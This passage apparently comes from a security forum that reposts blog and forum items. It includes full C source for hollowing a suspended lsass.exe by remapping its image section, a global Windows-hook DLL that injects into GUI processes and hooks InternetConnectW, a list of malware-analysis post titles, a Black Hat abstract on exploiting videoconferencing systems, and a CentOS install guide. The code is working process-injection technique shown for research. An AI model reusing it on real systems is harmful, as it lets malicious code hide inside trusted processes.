*read_proc) { IMAGE_DOS_HEADER *idh = NULL; IMAGE_NT_HEADERS *inh = NULL; idh = (IMAGE_DOS_HEADER*)read_proc; inh = (IMAGE_NT_HEADERS *)((BYTE*)read_proc + idh->e_lfanew); printf("Entrypoint = %x\n", inh->OptionalHeader.AddressOfEntryPoint); return (inh->OptionalHeader.AddressOfEntryPoint); } int main(void) { STARTUPINFO si; PROCESS_INFORMATION pi; char path_lsass[260]; PROCESS_BASIC_INFORMATION pbi; DWORD nb_read; DWORD ImageBase; HANDLE hsect; NTSTATUS stat; PVOID BaseAddress = NULL; PVOID BaseAddress2 = NULL; DWORD oep; memset(&si, 0, sizeof(STARTUPINFO)); si.cb = sizeof(STARTUPINFO); memset(?, 0, sizeof(PROCESS_INFORMATION)); memset(&pbi, 0, sizeof(PROCESS_BASIC_INFORMATION)); ExpandEnvironmentStrings(L"%SystemRoot%\\system32\\lsass.exe", (LPWSTR)path_lsass, 260); wprintf(L"[+] New Path for lsasse.exe = %s\n", path_lsass); if (!CreateProcess((LPWSTR)path_lsass, NULL, NULL, NULL, NULL, CREATE_SUSPENDED|DETACHED_PROCESS|CREATE_NO_WINDOW, NULL, NULL, &si, ?)) { printf("[-] CreateProcessW failed\n"); printf("LatError = %x\n", GetLastError()); return (-1); } ZwQueryInformationProcess = (long (__stdcall *)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG))GetProcAddress(GetModuleHandleA("ntdll"),"ZwQueryInformationProcess"); ZwMapViewOfSection = (long (__stdcall *)(HANDLE,HANDLE,PVOID *,ULONG_PTR,SIZE_T,PLARGE_INTEGER,PSIZE_T,DWORD,ULONG,ULONG))GetProcAddress(GetModuleHandleA("ntdll"),"ZwMapViewOfSection"); ZwUnmapViewOfSection = (long (__stdcall *)(HANDLE, PVOID))GetProcAddress(GetModuleHandleA("ntdll"),"ZwUnmapViewOfSection"); ZwCreateSection = (long (__stdcall *)(PHANDLE,ACCESS_MASK,PDWORD,PLARGE_INTEGER,ULONG,ULONG,HANDLE))GetProcAddress(GetModuleHandleA("ntdll"),"ZwCreateSection"); if (ZwMapViewOfSection == NULL || ZwQueryInformationProcess == NULL || ZwUnmapViewOfSection == NULL || ZwCreateSection == NULL) { printf("[-] GetProcAddress failed\n"); return (-1); } if (ZwQueryInformationProcess(pi.hProcess, 0, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL) != 0) { printf("[-] ZwQueryInformation failed\n"); return (-1); } printf("[+] UniqueProcessID = 0x%x\n", pbi.UniqueProcessId); if (!ReadProcessMemory(pi.hProcess, (BYTE*)pbi.PebBaseAddress + 8, &ImageBase, 4, &nb_read) && nb_read != 4) { printf("[-] ReadProcessMemory failed\n"); return (-1); } printf("[+] ImageBase = 0x%x\n", ImageBase); char read_proc[0x6000]; if (!ReadProcessMemory(pi.hProcess, (LPCVOID)ImageBase, read_proc, 0x6000, &nb_read) && nb_read != 0x6000) { printf("[-] ReadProcessMemory failed\n"); return (-1); } printf("(dbg) Two first bytes : %c%c\n", read_proc[0], read_proc[1]); oep = get_entrypoint(read_proc); LARGE_INTEGER a; a.HighPart = 0; a.LowPart = 0x8EF6; if ((stat = ZwCreateSection(&hsect, SECTION_ALL_ACCESS, NULL, &a, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS) { printf("[-] ZwCreateSection failed\n"); printf("[-] NTSTATUS = %x\n", stat); return (-1); } SIZE_T size; size = 0x8000; BaseAddress = (PVOID)0; if ((stat = ZwMapViewOfSection(hsect, GetCurrentProcess(), &BaseAddress, NULL, NULL, NULL, &size, 1 /* ViewShare */, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) { printf("[-] ZwMapViewOfSection failed\n"); printf("[-] NTSTATUS = %x\n", stat); return (-1); } memset((BYTE*)read_proc + oep, 0xCC, 1); memcpy(BaseAddress, read_proc, 0x2000); BaseAddress = (PVOID)ImageBase; printf("BaseAddress = %x\n", BaseAddress); ZwUnmapViewOfSection(pi.hProcess, BaseAddress); if ((stat = ZwMapViewOfSection(hsect, pi.hProcess, &BaseAddress, NULL, NULL, NULL, &size, 1 /* ViewShare */, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS) { printf("[-] ZwMapViewOfSection failed\n"); printf("[-] NTSTATUS = %x\n", stat); system("pause"); return (-1); } printf("BaseAddress = %x\n", BaseAddress); ResumeThread(pi.hThread); system("pause"); return (0); } And the include file : #include <stdio.h>#include <Windows.h> #if !defined NTSTATUS typedef LONG NTSTATUS; #endif #define STATUS_SUCCESS 0 #if !defined PROCESSINFOCLASS typedef LONG PROCESSINFOCLASS; #endif #if !defined PPEB typedef struct _PEB *PPEB; #endif #if !defined PROCESS_BASIC_INFORMATION typedef struct _PROCESS_BASIC_INFORMATION { PVOID Reserved1; PPEB PebBaseAddress; PVOID Reserved2[2]; ULONG_PTR UniqueProcessId; PVOID Reserved3; } PROCESS_BASIC_INFORMATION; #endif; typedef LONG NTSTATUS, *PNTSTATUS; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef NTSTATUS (WINAPI * PFN_ZWQUERYINFORMATIONPROCESS)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG); NTSTATUS (__stdcall *ZwQueryInformationProcess)( HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength OPTIONAL ); NTSTATUS (__stdcall *ZwCreateSection)( PHANDLE SectionHandle, ACCESS_MASK DesiredAccess, PDWORD ObjectAttributes OPTIONAL, PLARGE_INTEGER MaximumSize OPTIONAL, ULONG SectionPageProtection, ULONG AllocationAttributes, HANDLE FileHandle OPTIONAL ); NTSTATUS (__stdcall *ZwMapViewOfSection) ( HANDLE SectionHandle, HANDLE ProcessHandle, OUT PVOID *BaseAddress, ULONG_PTR ZeroBits, SIZE_T CommitSize, PLARGE_INTEGER SectionOffset, PSIZE_T ViewSize, DWORD InheritDisposition, ULONG AllocationType, ULONG Win32Protect ); NTSTATUS (__stdcall *ZwUnmapViewOfSection)( HANDLE ProcessHandle, PVOID BaseAddress ); So for the p0c i just put a INT3 at entry point of lsass.exe, and here the result : [h=2]Conclusion[/h] This method is really fun because it don't use SetThreadContext(), for updating eip before resuming thread execution. Sursa: w4kfu's bl0g

[h=1]Analyzing Unknown Malware[/h] [h=3]#1 Dropper of kernel-mode stealer[/h][h=3]#Offtopic The case of the gethostbyname() exception[/h][h=3]#2 Disclosure of an interesting Botnet - The Executable (Part 1)[/h][h=3]#2 Disclosure of an interesting Botnet - The Server (Part 2)[/h][h=3]#3 Disclosure of another 0day malware - Initial Dropper and Downloader (Part 1)[/h][h=3]#3 Disclosure of another 0day malware - Analysis of 2nd Dropper and 3rd Dropper (Part 2)[/h][h=3]#3 Disclosure of another 0day malware - Analysis of the final Payload (Part 3)[/h][h=3]#3 Disclosure of another 0day malware - Update and Additional Information[/h][h=3]#4 Analysis of an uncommon Downloader[/h][h=3]#5 South Korea Incident - New Malware samples[/h][h=3]#6 South Korea Incident - Analysis of a tiny Downloader[/h][h=3]#7 Brief description of a signed Adware/PUP Downloader[/h][h=3]#8 Back to the future - Analysis of an old Downloader[/h] Sursa: Analyzing Unknown Malware

Blackhat Eu 2013 - Hacking Video Conferencing Systems Description: High-end videoconferencing systems are widely deployed at critical locations such as corporate meeting rooms or boardrooms. Many of these systems are reachable from the Internet or via the telephone network while in many cases the security considerations are limited to the secure deployment and configuration. We conducted a case study on Polycom HDX devices in order to assess the current state of security on those devices. After analyzing the software update file format and showing how to get system level access to the otherwise closed devices we describe how to setup a proper vulnerability development environment which lays the groundwork for future security research. We demonstrate the feasibility of remotely compromising Polycom HDX devices over the network by implementing an exploit for one of the vulnerabilities we identified in the H.323 stack of the current software version which allows us to compromise even firewalled devices as long as the H.323 port is reachable. Our attack does not require the auto-answer feature for incoming calls to be turned on. We conclude with some thoughts about post-exploitation and describe possible ways to control attached peripherals such as the video camera and microphone which could be used to build a surveillance rootkit. For More Information please visit : - Black Hat | Europe 2013 - Briefings Sursa: Blackhat Eu 2013 - Hacking Video Conferencing Systems

[h=1]Creating Global Api Hook Using Windows Hook[/h][h=3]zwclose7[/h] Windows hooks allows you to inject DLL into all GUI processes that are running in the same session. This allows you to inject a hook DLL into most running processes. Windows hooks can't inject DLL into system processes or service processes. I just written a hook DLL to show you how to use Windows hook to inject DLL into GUI processes. The DLL has a exported function, SetHook. Use the rundll32 tool to call execute this function. Once the function is executed, the function set the Windows hook, and inject the DLL into all GUI processes. When the DLL is injected, it hooks the InternetConnectW function to block all websites that contain the word "google" in the URL. To install the hook using the rundll32 tool, use the following command line: rundll32 <DllPath>,SetHook When the rundll32.exe process is terminated, the Windows hook is removed, and the hooked InternetConnectW is also unhooked. I am using my API hooking header for this project. #include <stdio.h>#include <Windows.h> #include <WinInet.h> #include "apihook.h" typedef HINTERNET (WINAPI *pInternetConnectW)(HINTERNET,LPCWSTR,INTERNET_PORT,LPCWSTR,LPCWSTR,DWORD,DWORD,DWORD_PTR); pInternetConnectW fnInternetConnectW; HINSTANCE hInst; API_HOOK Hook; extern "C" __declspec(dllexport) LRESULT CALLBACK CallWndProc(int nCode,WPARAM wParam,LPARAM lParam) { return CallNextHookEx(NULL,nCode,wParam,lParam); } extern "C" __declspec(dllexport) void SetHook() { SetWindowsHookEx(WH_CALLWNDPROC,CallWndProc,hInst,0); Sleep(INFINITE); } HINTERNET WINAPI HookInternetConnectW(HINTERNET hInternet,LPCWSTR ServerName,INTERNET_PORT InternetPort,LPCWSTR UserName,LPCWSTR Password,DWORD dwService,DWORD dwFlags,DWORD_PTR dwContext) { if(wcsstr(ServerName,L"google")) { OutputDebugString("Your request to access Google has been denied!"); SetLastError(ERROR_ACCESS_DENIED); return NULL; } return fnInternetConnectW(hInternet,ServerName,InternetPort,UserName,Password,dwService,dwFlags,dwContext); } BOOL WINAPI DllMain(HMODULE hModule,DWORD dwReason,LPVOID lpReserved) { char szModuleName[260],str[1024]; hInst=hModule; switch(dwReason) { case DLL_PROCESS_ATTACH: GetModuleFileName(NULL,szModuleName,260); sprintf(str,"Hook DLL loaded into process %s (%d)",szModuleName,GetCurrentProcessId()); OutputDebugString(str); InitAPIHook(&Hook,"wininet.dll","InternetConnectW",HookInternetConnectW); fnInternetConnectW=(pInternetConnectW)Hook.OrigFunction; StartAPIHook(&Hook); break; case DLL_PROCESS_DETACH: UnhookAPIHook(&Hook); RemoveAPIHook(&Hook); break; } return TRUE; } [h=4]Attached Thumbnails[/h] [h=4]Attached Files[/h] WindowsHook.zip 270.07KB 13 downloads Sursa: Creating Global Api Hook Using Windows Hook - Source Codes - rohitab.com - Forums

[h=3]CentOS 6.4 Linux Installation Guide Step by Step[/h] Overview : This tutorial will help the system administrators to install CentOS 6.4 linux on Servers. Whereas CentOS (Community Enterprise Operating System) is a Linux distribution which attempts to provide a free enterprise class computing platform which has 100% binary compatibility with its upstream source, Red Hat Enterprise Linux (RHEL). Note : First download the ISO files (http://centos.mirror.net.in/centos/6.4/isos/x86_64/) for your respective Server's architecture and write the iso file to DVD. Installation Steps: Step:1 Set your Server's BIOS to boot from CD / DVD. Select Install or Upgrade existing system options as shown below : Step:2 Select Skip media test Step:3 Click on Next on welcome screen as shown below . Step:4 Select English & click on Next. Step:5 Select Appropirate keyboard ( U.S English in my Case). Click on Next Step:6 Select “Basic Storage Devices” option if you want to install OS locally on attached hard disk. Click on Next Step:7 Select “Yes , discard any data” Option as shown below Step:8 Set the Hostname and Click on “Configure Network” if you want to configure network during installation Step:9 Select the Time Zone with respect your Region Click on Next Step:10 Set the Root Password Click on Next Step:11 Select the Install Type , in my i am using “Use All Space”. If you want to create your own partition partition table , then select “Create Custom Layout” Option. Click on Next Step:12 Verify Partition Scheme and click on Next. Step:13 Click On the Format. Step:14 Click On “Write Changes to disk” Step:15 Set bootloader options. Click on next Step:16 Select the Software you want to Install , in my case i am using “Basic Server” Click On Next. Note : If want to select the software mannually , click on “Customize Now” and select your respective softwares. Step:17 Installation Started as shown below Step:18 Installation Completed , Reboot Your Server Now. Step:19 Welcome Login Screen (Run Level 3). Enter the user as root and enter password. Sursa: CentOS 6.4 Linux Installation Guide Step by Step